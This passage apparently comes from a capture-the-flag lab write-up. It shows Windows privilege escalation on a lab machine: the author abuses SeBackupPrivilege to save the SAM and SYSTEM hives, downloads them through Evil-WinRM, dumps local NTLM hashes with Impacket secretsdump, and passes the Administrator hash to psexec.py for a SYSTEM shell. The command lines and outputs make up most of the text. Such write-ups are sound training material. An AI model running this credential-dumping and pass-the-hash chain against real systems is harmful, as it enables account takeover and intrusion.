I followed the common SeBackupPrivilege → dump SAM trick:
Export registry hives:
  cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"
  # Both files saved successfully in current directory
Download the saved SAM and SYSTEM files via the WinRM session (Evil-WinRM has a built-in download command):
  *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> ls
      Directory: C:\Users\emily.oscars.CICADA\Documents
  Mode                 LastWriteTime         Length Name
  ----                 -------------         ------ ----
  -a----         10/1/2025   3:38 AM          49152 SAM
  -a----         10/1/2025   3:38 AM       18558976 SYSTEM
  *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download SAM
  Info: Downloading C:\Users\emily.oscars.CICADA\Documents\SAM to SAM
  Info: Download successful!
  *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download SYSTEM
  Info: Downloading C:\Users\emily.oscars.CICADA\Documents\SYSTEM to SYSTEM
  Info: Download successful!
On my machine, I used Impacket’s secretsdump.py to extract the local account hashes offline:
  secretsdump.py -sam SAM -system SYSTEM LOCAL
  Impacket v0.11.0 - Copyright 2023 Fortra
  [*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
  [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesnt have hash information
Pass-the-hash / remote service exec with Impacket psexec.py:
  psexec.py Administrator@10.129.231.149 -hashes ":2b87e7c93a3e8a0ea4a581937016f341"
  Impacket v0.11.0 - Copyright 2023 Fortra
  [*] Requesting shares on 10.129.231.149.....
  [*] Found writable share ADMIN$
  [*] Uploading file lDzxdAoT.exe
  [*] Opening SVCManager on 10.129.231.149.....
  [*] Creating service lfkC on 10.129.231.149.....
  [*] Starting service lfkC.....
  [!] Press help for extra shell commands
  Microsoft Windows [Version 10.0.20348.2700]
  (c) Microsoft Corporation. All rights reserved.
  C:\Windows\system32> 
From that shell I could read the root flag:
  type C:\Users\Administrator\Desktop\root.txt
  b77facd8************************